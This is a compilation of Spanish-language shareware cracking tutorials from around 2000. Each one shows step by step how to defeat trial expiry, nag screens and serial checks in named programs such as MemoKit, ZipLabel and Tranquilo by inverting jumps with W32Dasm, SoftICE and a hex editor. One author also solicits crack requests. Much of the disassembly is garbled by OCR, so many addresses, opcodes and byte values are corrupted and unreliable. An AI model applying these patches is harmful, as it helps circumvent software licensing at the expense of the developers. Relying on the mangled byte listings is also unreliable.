:004c0a86 6200 push 00000000 


:004c0a88 668b0db0294c00 mov cx, word ptr [004c209b0] 
:004c0a8f b201 mov dl, 01 


* possible stringdata ref from code obj ->"debug: sharesexit" ("salimos de el intento de llamar a sleep") 
:004c0a91 b8bc294c00 mov eax, 004c29bc 

:004c0a96 e8415ef9ff call 0O04568dc 

:004c0a9b 33d2 xor edx, edx 

:004c0a9d 8b8364030000 mov eax, dword ptr [ebx+00000364] 

:004c0aa3 es4429f9ff call 004533ec 

:004c0aa8 al5c9e4d00 mov eax, dword ptr [004d9e5c] 

:004c0aad 8b00 mov eax, dword ptr [eax] 

:004c0aaf e820eef8ff call 0O044f8d4 


creo que es lógico lo que hay que hacer cambiamos jl 004c0a3a por jl 0O4c0a7a para que salga de el intento de llamada 


el resumen de la tragica y patetica muerte de esta proteccion: 


en este programa hemos aprendido que se puede crackear directamente en la verificación del registro, a desempakar 
(como todavia no se perfectamente el volcado manual no lo usé), otra cosa la función sleep que deja al programa en un 
estado inactivo. 


les recuerdo que antes de llegar a crackear el programa así de simple tuve que analizar el coñazo de llamadas (tarea 
complicada). 


hasta la vista gente 
saludos gohan ( este tut esta dedicado a mi hermana ssj pan que es mi púpila por los momentos, y a estado+porcino 


que fué uno de sus tutoriales el primero que leí sobre este mundo underground) "ya basta de jaladera y viva el ssj 


ssj= super saiyan 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 
Programa: | MindSoft Utilities 2000 v3.0 


es una utilidad compuesta por varios programas que realizan distintas funciones (borrar, desfragmentar, 
descomprimir ...) independientes por lo que voy a hacer en este tutorial es quitar las limitaciones de uso de los 
distintos programas 


empezaré conel programa [llamado accelerator.exe. 


al ejecutarlo nos sale una nag'pidiendo que nos registremos y enel titulo nos dice que es una evaluación. 
seguimos, le damos 4 veces a siguiente y nos vuelve a salir una nag que dice 


Versión de evaluación EZ 


Esta versión de evaluación no actuará sobre su sistema. Registre 
hoy mismo este software en nuestra tienda virtual 


bueno ya tenemos bastante. vamos a quitar estas limitaciones. 


desensamblamos el programa con w32dasm para visual basic. 


buscamos en strnref'lo que había escrito enel titulo "mindsoft accelerator [evaluaci' 


"Ewaluaci” 

"MasHleLache=" 
"MasHFleLache=1b304" 
"Memoria 4H en zu PC: ” 
"MindS of Accelerator [Evaluaci" 
"MindSoft Accelerator” 

"Minds oft Utilities" 


doble click'sobre esto y aparecemos en: 


aparecemos en la dirección :42b84a9. un poco mas arriba vemos un salto que no se produce por lo que 
entramos en la evaluación. simplemente hay que invertir este salto y adios'a las limitaciones. 


en la linea de abajo vemos el offset de que se trata. vamos a nuestro editor hexadecimal preferido (yo uso el 
hex workshop). con ctrl-g nos sale una ventana donde introducimos el offset'(en micaso 2b88c). 


ahora cambiamos el 84 por 85, guardamos los cambios y ya esta. 


1403 


0000 €745 FCO9 0000 0066 C705 2400 4300 aos L 
FFFF C745 FCOA 0000 0068 5C9C 4200 86B45 Priv hs.B..E 
065B 088B 5508 52FF 5154 DBE2 6985 44FF U.R.OT....D 
FFFF 83BD 44FF FFFF 007D 2064 5468 3894|....D....) jTh8 
4200 8B45 0850 8B8D 44FF FFFF 51FF 153C|B..E.P..D...Q..< y 


lo ejecutamos de nuevo y vemos que en titulo ya no pone que es una evaluación, han desaparecido las nags y 
las limitaciones. 


las desprotecciones de cleanup.e xe 


,io.exe, ped.exe, qzip.exe, recover.exe, regpu.exe, restore.exe, shelter.exe, split.exe, wipe.exe se realizan 
siguiendo los mismos pasos que en la hecha anteriormente. 


la desprotección de defrago.exe es algo distinta. 
en las strmref del w32dasm no aparece "mindsoft defrago [evaluaci", por lo que tendremos que buscar otra. 


encontramos una referencia a evaluación ("evaluaci"). clickeamos "dos veces y nos lleva al sitio en que aparece. 


: 00440996 C7459C04000280 mov [ebp-64], 380020004 
:0044099D C74594024000000 mov [ebp-6C], 00000001 
200440944 C745AC04000280 mov [ebp-54], 80020004 


:0044094B C745A440A000000 mov [ebp-5C], 00000004 


* Possible StringData Ref from Code 0b3j ->"Evaluaci" 
| 


:004409B2 C7857CFFFFFFE4DC4000 
:004409BC C78574FFFFFFOSO00000 
:004409C6 8D9574FFFFFF 
:004409CC 8D4DB4 


mov dword ptr [ebp+FFFFFF?C], 0040DCE4 
mov dword ptr [ebp+FFFFFF?4], 00000008 
lea edx, dword ptr [ebp+FFFFFF?4] 

lea ecx, dword ptr [ebp-4C] 


en la dirección :440989 hay un salto que podemos invertir, pero este no es (lo se porque lo probe como hay 
que hacer muchas veces). siguiendo para arriba hay varios saltos jge'que no nos interesan. seguimos, hasta 


llegar a: 


:0044076A 85D2Z 

:0044076C 0FS4C1020000 
200440772 C745FCO9000000 
200440779 66C705C2404400FFFF 
200440782 C745FCOADOOODO 
200440789 6AFF 


test edx, edx 

je 00440433 

mov [ebp-04], 00000009 

mov word ptr [004440C2], FFFF 
mov [ebp-04], 0000000A 

push FFFFFFFF 


* Reference To: MSVBVM6O.  vba0nError, Ord: 0000h 


:0044078B FF1564104000 
:00440791 C745FCOBOOOODO 
: 00440798 833DA4046440000 
:0044079F ?51C 

:004407A1 6840464400 
:00440746 6854024000 


| 

Call dword ptr [00401064] 

mov [ebp-04], 0OD00000B 

cmp dword ptr [00444640], 00000000 
jne 004407BD 

push 00444640 

push 0040C254 


, 


el salto que hay en :0044079f no es el que nos interesa. según los cracks anteriores el salto tiene que ser je 
en formato 084. este salto es el que se encuentra en :0044076c. 


miramos su offset'lo abrimos con el editor hexadecimal, fijamos los cambios y ya esta. 


conclusión 


la protección del programa no parece nada complicada. 


este manual solo esta realizado con fines educativos. siel programa te gusta y piensas seguir usándol j;;¡ 
compratelo ly asi apoyarás a los creadores de programas españoles. 


saludos y hasta la próxima. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Quick Editor 6.0 

PROTECCION: NagScreen ,Limitacion de Tiempo 

Objetivo: Eliminar Tiempo Limite y Nagscreen 

Descripcion: Un Editor de Videos al formato OT o MOV 

Dificultad: Facililla 

DOWNLOAD : No lo recuerdo, Busquen en www.download.com 

Herramientas: Softice W32dasm Editor Hexadecimal 

CRACKER: Gohan FECHA: Desconocida 
introduccion 


hola ahora si me han seguido en mis lecciones no son ya unos principiantes con los conocimientes que tienen 
hasta ahora con mis manueales ya estan apunto de pasar a nivel intermedio que es donde estoy yo pero cada 
vez se aprende y mientras descubra algo nuevo lo indicare en lecciones y espero que ustedes tambien 
compartan este conocimientos con los demas, y ahora con el mensaje: 


antes que nada tu quieres ser un great saiyan? 

bueno si quieres serlo mi e-mail gohanOchevere.com . hací que me escribes si quieres formar parte de los 
mas poderosos del universo. ademas diganme si mis tutoriales necesitan mas explicacion, ademas aceptó 
pedidos de cracks. 


al atake 


1-primer paso: 
abrimos el programa nos trae una tediosa nag que es lo que atacaremos veamos el texto de la nag "quickeditor 
registration reminder” bueno vamos al segundo paso. 


2-segundo paso: 

desamblamos el programa "quickeditor.exe" y aja no aparece el texto ni nada similar, aqui es donde atacamos con 
softice, guarda este texto como un projecto, ejecuta tu softice "tu sabes el proceso típico". bueno ahora abre el 
desamblado hecho ( algo que nunca nombro lo de que tienes que desamblar es la copia del archivo). antes de ejecutar 
el programa pon en softice, el bpx messageboxa a ver si es lo ejecutas y no es, bueno prueba con bpx dialogboxparama 
ejecutas el programa y aparece, presionemos f11 para salir de la dll pero que pasa sale de softice. analizemos antes de 
que aparesca la ventana muestra la ventana, quitamos lo bpx con el siguiente para quitar todos bc*. ahora pon bpx 
showwindow ejecutamos el programa y aparece el softice, ahora presiona f11 hasta salir de la dll, cuando sales de ella 
presiona £10 hasta llegar al salto je 00421819 que esta antes de la llamada dialogboxparama toma su adress que es 
00421718 

ahora ve a ese codigo en w32dasm, ya que apareciste salta haber a donde va, bueno a mi parecer este verifica si 
estamos registrado o no y si no salta nos manda el nag. 


el crack: 
cambia je 00421819 por jmp 00421819 para que evita el nag. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: MemoKit 1.2 

PROTECCION: Limitación de Tiempo 

Objetivo: Hacer que no caduque 

Descripcion: Optimización del sistema 

Dificultad: Novato 

DOWNLOAD : http://www.memokit4all.com 

Herramientas: W32dasm, Hex Workshop (Editor Hexadecimal) 

CRACKER: Perico FECHA: 15/10/2000 
introduccion 


es un programa que tiene 30 días de evaluación, pasados los cuales el programa caduca y deja de funcionar 
saliendo un aviso 


MemoKit trial version has expired! 


If you want to continue using this software please register. 


0) You are using the expired trial version of Memokit. 


nuestra misión es hacer que el programa siga funcionando pasados los 30 días y podamos evaluarlo durante 
mas tiempo. 


al atake 


para realizar esto lo desensamblamos con w32dasm y en string ref buscamos el titulo de la ventana “memokit trial 
version has expired!” 


"MemoKit Menu" 

"MemoKit Skin files [*.skn]" 
"MemoKit trial time violationi'" 
"MemoKit trial version expiration * 
"MemoKit trial version has expiredl'" 
"MemoKit will not terminate itself." 
"memokit.exe'" 


"Memory Recovery Time Bar" 


hacemos *doble-click” sobre el titulo y aparecemos en: 


:0040CDOA FF1508774600 Call dword ptr [00467708] 
:0040CD10 6210 push 00000010 


* Possible StringData Ref from Data 0bj ->"MemoKit trial version has expired!" 


¿OOAOCDAZ RADO a a 


* Possible StringData Ref from Data 0bj ->"You are using the expired trial " 
=»+"wersion of Memokit." 
/ 
:0040CD17 6870D94200 push 0042D970 


miramos mas arriba hasta que veamos el salto que nos manda aquí cuando el programa expira. este se encuentra en: 


* Referenced by a (Uinconditional or (Cjonditional Jump at Address: 
|:0040CBC41(C) 
| 


3D040CCAC 837DF402 $ dword E e 00000002 


este salto no se produce, por lo que cuando el programa caduca sigue avanzando hasta encontrar el mensaje de 
caducado. lo que tenemos que hacer es invertir el salto y hacer que se produzca (cambiando el “85” por *84”). 


esto lo podemos hacer de dos formas: 


1- miramos en la línea inferior del w32dasm donde pone: ...... COoffset OODOCObOH ....., de aquí apuntamos 
cObO sin los ceros ni la “h”. nos vamos al hex workshop y pulsamos ctrl.-g, nos sale una ventana en la que 
ponemos c0b0 y vamos directamente a 0f8532..., cambiamos el 85 por 84 y guardamos los cambios. 


2- buscamos en el hex la cadena *0f8532010000” y hacemos lo mismo que antes. 
con esto el programa no caduca nunca. 


con esto en realidad ya hemos acabado, pero si nos molestan los mensajes recordatorios( “trial version” etc.), 
eliminarlos es muy fácil con el hex. basta con buscar el texto molesto y eliminarlo. 


en este caso buscamos en el hex 30-day trial versión y nos aparece 


0000 
2076 6572 7369 2020 2020 version 


00020630 
00020640 


6577 6172 
160 


2020 2020 2020 2025 7520 2064 6179 206€ %u day 1 
6566 7400 3330 2D64 6179 2074 7269 616C|eft.30-day trial 
2076 6572 7369 6F6EÉ 2020 2020 2020 2020| version 


2020 2025 7520 2064 6179 7320 6065 6674 
0000 0000 6674 7470 3A2F 2F77 7777 2E6D 


%u days left 
...+Attp://www,.m 


cambiamos el primer 3 (33 en hexadecimal) por 00. esto le indica que la cadena ha terminado (antes de empezar). 
vemos que la cadena sigue apareciendo, luego esta cadena no era la responsable. la volvemos a buscar y hacemos lo 
mismo, vemos que ahora si desaparece. 


por supuesto que puedes cambiar las letras por lo que quieras, y eso es lo que aparecerá. 


con esto terminamos. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 


Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Ziplabel Software 


Serial - Algunas Opciones deshabilitadas 


Simular Estar Registrados 


Como Parchar todos los programas para ser usuario registrado :=) Esta empresa tiene varios 
sharewarecitos dedicados a la creación de etiquetas para diferentes usos y todos se desprotegen 
igual, (para discos zip, 3.5" diskettes, LS-120 disk cases, CD's etc. etc. 


PRINCIPIANTE 


www.ziplabel.com 
w32dasm, Softice v 3.xx y Hexworkshop V x.xx 


PrOfesOr X FECHA: 22/10/00 


introduccion 


hola a todos, bueno amigos, regreso con otro tutorial mas, creo que es 7 tutorial, no importa cual vaya , 
lo que importa es que este tutorial sirva para aprender una forma mas de como '' protegen o tratan de 
proteger las empresas sus programas" :), los cuales verdaderamente los de esta empresa , saben lo que 
es cracker y cual es su pasatiempo :), por que al principio me !!! saque de onda !!! cuando instale el 
programa e inserte un numero de serie y no salio nada de ventanita de error!!! y me dije !!!'" mmm !! 
por el santo niño de la trinidad !!! estos cuates de la empresa ziplabel si saben hacer su trabajo!! pero 
veran que por mas que protegas algo, siempre habra una forma de tronarla, a continuación veran por 


al atake 


empecemos como se dice en mi pais !!!! a lo que te traje chencha !!! lo primero que hice despues de instalar el 
programa fue analizarlo, para ver en que lenguaje estaba hecho,si estaba empaquetado o encriptado, entonces 
pense , !!! que pinche herramienta uso !!!! ??? y escogi el grandioso file inspector v 2.0 herramienta creada por 
mi gran amigo viper del grupo k-for, me dije manos a la obra abri el file inspector y 2.0 le di click en el boton de 
abrir archivo y luego di click en analizar y despues click en el apartado llamado compilador y esta es la 
informacion que me mostro : 


€X file insPEctor 2.0 Aa EZ 


Datos PE | Tabla de objetos | Importaciones/Exportaciones Compilador | Herramientas | Acerca de... | 


“Reconocimiento de signaturas 


Compilador: Microsoft Visual C++ 5.0 
Packer: No encontrado 


Encriptador: No encontrado 


Versión de la librería; (HM40 Información. .. 


Versión del enlazador: [3.0 Wersión de la imágen: fo.o 
Versión del SO; l4.o Versión del Subsistema; fá.0 


ES Abrir archivo Ly Analizar GÍ Salir 


¡CiArchivos de programa! ZipLabellZipLabel.exe 


bueno hasta el momento ya sabemos en que fue hecho y que no esta empaquetado. ni encriptado, muy bien !!! 
entremosle al toro por los cuernos !!! , nuestro siguiente paso es analizar el programa para ver si tiene algunas 
opciones desabilitadas o algo por el estilo, al arrancar el programa y en el menu de help me encuentro con una 
opcion para insertar numero de serie: 


ZipLabel Registration Codes Ez 


ZipLabel is shareware. Registered users 
get codes to enter below that change the 


initials on the spine to their initials and 

notification of new releases. Cancel | 
¡Registration Code — 

Registration Line 1: [profesor 
| Registration Line 2: fi 234567890 


puse mis datos le di click en ok yyyyyyyyyyyyyyyyyy!!?? paso mecha nada de ventanas de error !!!, creo que 
estos programadores saben lo que es un cracker y lo que puede hacer,mmmm, bueno entoces que hago?, ok 
sigamos analizando el programa y despues de un rato me encuentro en el menu spine y dentro de ese selecciono 
la opción customize initials... y aparece una linda y hermosa ventanita diciendome '''' sorry only registered user 
can access this funtion '''' mmmmm, creo que esta ventana tiene la pinta de ser una despanpanante message box 
11, Ok ! entonces vamos a atacar por ahi!!!. 


Registration Error 


Sorry, only registered users may access this function 


d 


ahora nos vamos al w32dasm y lo desensamblamos el ziplabel.exe, en mi maquina tardo un poco en 
desensamblarse , una vez desensamblado vamos al string references y buscamos ese string y lo encontramos: 


14W32D asm List of String Data Items 


To Search Disassembly for String Data, Double Click on Text 


"Select Image File...'* 


"Separate" 
"sheliOpenkcommand" 
"shellPrinttcommand" 
"ShowCommx<d" 
"ShowExtZd" 
"ShowSizezZd" 
"ShowZip<d" 
"SideMarain" 

"Size: 20.2F' x Z0.2f"" 


"Sor 


"SortModeZd" 


"Spineáliqnzd" 


Close 


"Select Subdirectories To Display” 


"Softwarevefp3ZipLabel 1.0" 
, cracked registration codes." 


"Sor, only registered users may '" 


"Spine Background Brush Failed!" 


Cancel Search 


ha 
Copy Al Copy View] 


bueno, damos doble ckick y nos manda a esta parte del codigo: 


* Reference To: USERS2 DialogBoxParama, Ord:D0SEh 


00412515 FF1570664500 
:0041251B E97?2170000 
200412520 AI1BC2A44500 
200412525 SBODBS2A4500 
:0041252B 8D542410 
:0041252F 52 

200412530 50 

200412531 51 

00412532 ES39B80000 
00412537 S83C40C 
200412534 85c0 
200412530 7518 
:D0041253E 6A10 


| 

Call dword ptr [00456670] 

jmp 00413092 

moy eax, dword ptr [0045ZABC] 
mov ecx, dword ptr [00452A4B8] 
lea edx, dword ptr [esp+10] 
push edx 

push eax 

push ecx 

call 0041DD7?0 

add esp, 0000000Cc 

test eax, eax 

jne 00412556 

push 00000010 


* Possible StringDsta Ref from Data 0bj ->"Registration Error" 


: 00412540 68630904300 


| 
push 00439030 


* Possible StringData Ref from Data 0b3 ->"Sorry, only registered users may 


=>laccess this function" 
| 


200412544 53 


push ebx 


como podemos ver caemos en 412545 , y una lineas mas arriba en 41253c vemos un jne el cual nos manda a la 
ventana de error, mmmmm, 0k hey esperen no cambien el salto, si se dan cuenta unas dos lineas arriba hay una 
llamada (call) muy sospechosa que les parece si le damos un vistazo a lo que hace esa call !!!!, para ir al codigo 


Call 
que ejecuta esa call nos posicionamos en la linea 412532 y damos click en E bueno entonces entramos en esa 


call y vemos el siguiente codigo: 


:DO4IDDEO 751A me O041DDCC 


como podemos ver esta call lo que hace la rutinilla es verificar si somos usuarios registrados, y devuelve ( si no 
los somos, y 1 en caso contrario; y abajo un salto despues de la comprobación mmmmm!!! entoces lo que hay 
que hacer es cambiar ese salto por nop para que nunca salte ok! bueno pues vamos al salto y apuntamos su 
offset que es 1d1b0, despues nos vamos al editor hexadecimal de su preferencia eh insertamos el offset el cual 
nos manda a la direccion a cambiar, la cambiamos por nopnop = 9090, guardamos los cambios ejecutamos el 


menu help=>about y vean lo que aparece: 


About ZipLabel 


creo que ya la hicimos, thanks for registering!!!!! : 
espero que les guste, alguna duda o sugerencia favor de escribirme a mi email. 


nota: por cierto un saludo a el grupo kfor y a txeli, y recuerda si quieres que tus tutoriales aparescan en la 
"compilacion de tutoriales 2000" favor de enviarmelos a mi email 


profesor_xG hotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: HookProtect 2.05 


PROTECCION: Name / Serial 
Descripcion: HookProtect 2.05 es un programa que detectando los Keyloggers, interceptores, troyanos etc 
Dificultad: Facililla 


DOWNLOAD: http://annaltd.webjump.com/index.html 


Herramientas: W32dasm Editor Hexadecimal 


Riverwind 22/10/2000 


introduccion 


antes de nada deciros que solo llevare en en esto unos tres meses con lo cual mis conocimientos son 
elementales,en mi anterior tuto del abracadabra me limito a buscar un serial valido para nuestro name,que 
quede incompleto por no hacer un keygenerator estoy de acuerdo,ya he dicho que no tengo demasiados 
conocimientos. 


este programa es un poco antiguo pero como se trata de aprender nos servira para nuestros propositos. 


una vez que tengamos el programa instalado,lo ejecutamos para obtener informacion para planear nuestra 
estrategia,ejecutamos el hook y nos vamos al "about" y pulsamos sobre "register",nos aparece otra ventanita que nos 
invita a meter un name/serial,introducimos uno cualquiera y nos el siguiente mensaje de error" invalid registration 
code", nos apuntamos este mensaje en un papel y lo que tenmos que hacer es desamblar el hook y buscar en las strn ref 
dicha cadena una vez localizada pulsamos sobre ella y nos lleva asta...... 


* Possible StringData Ref from Data 0b3j ->"Invalid registration code" 
l 


:00406DFO 6400 push 00000000 


bien lo que bamos hacer sera investigar el codigo hacia arriba aver lo que nos encontramos por el camino,hay unas 
referencias que nos dan las gracias por registrar nuestra copia,a mi parecer esto es una buena señal ya que nuestro salto 
debe estar muy cerca,si siguimos examinando el codigo veremos algo muy interesante es algo como esto... 


200406D82 ESDB960000 Call 00410462 


:00406D87 ESOCFEFFFF call 00406B98 
:00406D8C 85C0 test eax, eax 


la direccion 00406d8e nos lleva al mensaje de error,si cambiamos el 744d por 754d nos daran las gracias por aver 
"comprado" el programa,pero si cerramos el hook y lo volvemos a ejecutar nos daremos cuenta de que este sigue sin 
estar registrado este es debido a que debe comprobar nuestro name/serial en algun sitio mas,bueno pues nos vamos de 
nuevo a este salto y veremos que hay unos call,a mi se me ocurre seguir el primero de ellos aver a que parte del codigo 
nos lleva, 


nos situamos sobre.. 
00406d87 es0cfeffff call 0O406b98 


pulsamos sobre el botoncito que dice call y nos lleva a esta parte del codigo....... 


* Referenced by a CALL at Addresses: 
|:004016DC , 200406D87 
| 


:00406B99 56 push esi 
:D0406B9A 57 push edi 
:DO406B9B 55 push ebp 
:DO406B9C 81C47CFFFFFF add esp, FFEFFFF7?C 
:D0406BA2 BFADEF?7600 mov edi, 0O076EFAO 


seguiremos traceando el programa hacia abajo asta encontrar algo interesante,despues de un ratito veremos algo que 
nos llama la atencion,o que por lo menos a mi me parece interesante 


* Reference To: KERNEL32.l1strcmpA, Ord: 0000 

l 
:00406D1A ESF?960000 Call 00410416 
:D00406D1F 85C0 test eax, eax 


este salto es el que comprueba nuestro name/serial y si cambiamos el 75 por un 74 y ejecutais el programa de nuevo 
vereis que este queda registrado.espero que todo lo expuesto aqui sirva para algo. 


salud2 


karpoff spanish tutor: pagina dedicada a la dibulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Obetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Tranquilo..!!v1.35 


Name / Serial 


Hacer que el 


| programa acepte cualquier numero de serie 


Para control 
Novato 


www.carluis.com 


lar el gasto telefónico en internet 


W32dasm (para VB) Editor Hexa., File Inspector 2.0 


Act Mago 


FECHA: 24/10/2000 


introduccion 


este es mi primer tutorial, por lo que si no entienden algo por favor sólo pregúntenlo actmagoOhotmail.com , es 
obvio que sólo preguntas referentes a este tutorial y no pedidos u otras cosas. lo he escrito especialmente para 
aquel que sabe muy poco o casi nada. al menos debes saber usar el w32dasm y el editor hexadecimal, aunque aquí 
te explicaré lo que debes hacer apoyado por algunas imágenes para ayudar el entendimiento de este. 


si eres un cracker con cierto recorrido debería tomarte un minuto hecharlo al saco;es una protección demasiado 
mala,e incluso si eres avanzado ni siquiera deberías estar leyendo esto por que estarías perdiendo tu tiempo.la 
única dificultad que presenta es que está hecho con visual basic,pero eso se soluciona con el excelente parche de 


duelist. 


si el w32dasm era bueno incluso sin soportar vb imagínate ahora que con este parche soporta dicho lenguaje.queda 
transformado en una joyita. 


comentario del programa 


es un programa bastante sencillo que sirve para controlar el gasto telefónico de tu conexión para internet, es muy 
fácil de usar por lo que es recomendable para cualquier usuario de cualquier nivel. el único problema es que el 
programa es de la clase shareware y en este caso tiene libre uso de 30 días, y por lo tanto si quieres seguir 
usándolo deberás pagar un par de dólares. 


pero nosotros tenemos la solución para este problema y cabe recordar que todo este escrito tiene sólo propósitos 
educacionales. ..la solución te la muestro a continuación: 


al atake 


antes que todo vale la pena hecharle un vistazo al programa, usarlo, mirarlo o por lo menos tener un acercamiento con este. 


abrimos el programa, lo primero que vemos es un rectángulo amarillo que dice debe registrarse, vamos a la ayuda y ahí 
está la opción registro. 


le das click y aparece un cuadro para registrarse... 


coloca tu nombre, tus apellidos : ) y cualquier clave y da click en validar, verás esto... 


Tranquilo EZ 


ups !! nos preocupamos pero tenemos el toque y la solución llegará pronto... 


rápidamente abrimos el w32dasm parchado para aplicaciones vb por duelist (puedes bajar el parche en www. protools.cjb.net 
no pesa nada) buscamos el ejecutable tranquilo.exe y lo abrimos con w32dasm y buscamos en string data references (ahora 
activa para ejecutables hechos en vb gracias al parche) aquella frase que nos apareció cuando introducimos el serial falso en 
la caja de registro.verás algo así: 


W32Dasm List of String Data Items 


To Search Disassembly for Sting Data, Double Click on Text 


"DiaBonoRete"" 
"Dic" 
"Diciembre" 
"Eln" 

"El programa Tranquilo..!! es Shareware, * 
"El Registro es inv!" 

"El Registro es v'' 

"El Registro no es v” 

"El tiempo de Preconexi" 
"El valor introducido para la alarma " 


"Error en Borrado HTRE" 
“Erroren Fl Load" 
"Error en Fl Option?" 


dale doble click para llegar aquí. 


FO 


BWHSO 


ya que sabemos de donde viene,sólo debemos seguirlo para resolver el asunto. 


da click en goto y luego en goto code location e inserta 0048de84 que es el lugar donde es generado el salto que te manda a 
el registro no es valido. presiona ok y estarás ahí. se verá así: 


hey !! ya que sabemos quien es el malo de la historia ahora sólo debemos hacer el trabajo sucio que consiste en: 


- anotar el offset que está en la parte baja del w32dasm. 


-Ccorrer al editor hexadecimal ir a file ,luego open y abrir tranquilo. exe, luego edit, goto e insertar 


el offset 8d284. veremos algo así: 


Mi Tranquilo. exe* 


disculpen,todavía no he dicho que vamos a hacer con el salto malo, bueno creo que ya lo deben saber, es obvio,lo vamos a 
invertir para que quede así: 


[0008D2A0 E8FE FFFF 50FF 1500 A54A 008B F8€ 
0008D2B0 FEFF FF8B 1D18 A34A O0FF D3C7 857 


es decir, 

0f8432050000 -------- > 0f8532050000 o je a jne. 

ahora que está invertido, cuando insertes un número de registro falso hará lo contrario que hacía antes : 
antes: si el serial es correcto no salta, si el serial es falso si. 

ahora: si el serial es correcto salta,si el serial es falso no. 


como nosotros vamos a colocar cualquier número de serie,es decir un número falso,no saltará el mensaje de error y nos 
dejará pasar y mostrará el mensaje de si registrado. 


listo, guarda los cambios y abre el programa ,ve a la opción registrar e ingresa tu nombre, apellido, cualquier serial y da click 
en Validar y booom !! 


Tranquilo Ez 


programa crackeado...pero pueden ir x:1windows y ahí encontrarán un archivo llamado ceth16.orx que tiene el nombre y los 
apellidos que pusiste en la caja de registro...curioso no? : ) : ) : ) 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoG hotmail.com 


saludos 


saludos a tnt!. excelente página, muy buen trabajo...sigan adelante. ( especialmente a xasx, (no pararé : ) ) y profesor 
Xx.) 


saludos a toda la people de tutoriales2000. 
saludos al l.d.a. (monofeo , flaco (pastero), chirda, taza, afo, solerman, nasal, peter y a todos los demás) 


saludos a todos los crackers del mundo. 


chao !! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Start Clean v1.2 


Objetivo: Simular estar registrados 


Dificultad: Principiante 


W32Dasm y Editor Hexadecimal 


introduccion 


bueno, este tutorial va dedicado a todas las personas que me han ayudado cuando he tenido dudas. si alguien 
quiere poner el tutorial en su página, puede hacerlo libremente, mientras figuren mi nombre y dirección de e- 
mail. 


alguna duda, sugerencia: mandame un mail a ttxotxo Onavegalia.com 


visitad mi pagina web: http://www.geocities.com/ttxotxo 


lo primero es hacer una copia del archivo original. y una vez hecho eso, abrimos el w32dasm, y desensamblamos el 
ejecutable. 


EN URSoft W32D asm Program Disassembler?Debugger (8.7) 


pjenssamioios: Project Dela Search Goto Execute Text Functions HexData Refs Help 


Code Offset = 00000400, Code Size = 00003400 
Data Offset = 00004400, Dara Size = 00001200 


Nuuber of Objects = 0006 (dec), Imagebase = 00400000h 


ObjectOl: .text PVA: 00001000 Dffset: 00000400 Size: O0003A00 Flags: 60000020 
ObjectO0Z: .rdata  RWA: 00005000 Offset: OO0O3E00 Size: 00000600 Flags: 40000040 
Object03: -data  RWA: 00006000 Offset: 00004400 Size: 00001200 Flags: CO000040 
Object04: -idata  RWA: 00009000 Offset: 00005600 Size: 00000400 Flags: CO000040 
'ObjectO05: .rsro PVA: ODOOADOO Offset: DODDSOOO Size: 00001400 Flags: 40000040 
Object06: .reloc RA: O000C000 Offset: 00007400 Size: 00000800 Flags: 42000040 


HAHAHA MENU INFORMATION 44444 RRA RARA AA AA 
There Are No. Menu Resources in This kovlication 


ahora, voy a suponer, que el programa una vez registrado, creará en el registro algún tipo de clave, con el nombre, 
codigo, y demás datos de registro. entonces pulsamos el botón de imp fn, y buscamos alguna funcion de registro: 


| W320 asm Alphabetical List of impuited Functions 
“To Search Disassembly for Function, Double Click on Text 
¡JADVAPI32 ReoCloseke A 


ADVAPI132 RegCreatekegE ás 
ADVAPI32 Regú 0 por 
ADVAPI32 RegQuenYalueE xa, 

ADWAPI32 RegSetvalueE mó, 

COMCTL32.COMCTL32:NoName0000 

KERNEL32 CloseHandle 

KERNEL32 DeleteFiles, 

KERNEL32 ExitProcess 

KERNEL32. FindClose 

KERNEL32 FindFirstFileó, 

KERNEL32 FindNextFilea, 

PAKERNEL32 FlushFileBufters 

KERNEL32 FreeEnvironmentStringsA 

KERNEL32 FreeE nvironmentStingsw/ 

KERNEL32 Getá,CP 

KERNEL32 GetCommandLineá xs] 


Copyál | Copy View 


y nos encontramos con regcreatekeyex, funcion que crea una clave de registro, y si observamos bien el código, 
observamos referencias a textos como 'name', 'program', 'code'. o sea que hasta aquí podíamos haber llegado también 
por medio del botón strn ref, y buscando cualquier referencia a estas palabras. bueno, observando el código de arriba, 


vemos que hay una referencia a una función: Istrempa, funcion que compara dos cadenas de texto, y justo después un 


NÉ (jump if not equal). o sea, que si al comparar , no es igual, salta, seguramente hacia el codigo de error, y si son 


iguales, sigue, y registra el usuario, entonces, lo que podemos hacer es parcherar ese jne, por ejemplo por un je. así 
siempre, se registrará. 


00401 10D so 


:004011DE 6330604000 


add esp, EDaS 
push sax 
push 00406030 


. Reference To: KERMEL3Z. lstrompaA, s Ord: 0269. 


ce 1E3 


:004011FB 
00401202 
00401204 
00401209 


ep4cz408 
FS 50 
8D0942418010000. 
5400 
: 683F000F00 
6400 


y F1 520924000 


| 
Cala cdo pex PRIETO) 


lea 20X, dword pur [asp+08) 
push esx- 

push ecx 

lea edx, dword per [esp+00000118] 
push 00000000 

push O00RO03F 

push 00000000 


* Possible Stringbata Ref from Data 0bj “="Progra 


:0040120B' 68682624000 


1 
push 00406268 


00401210 6400 push DO0DO0DO a sE 
00401212 52 push edx Se 
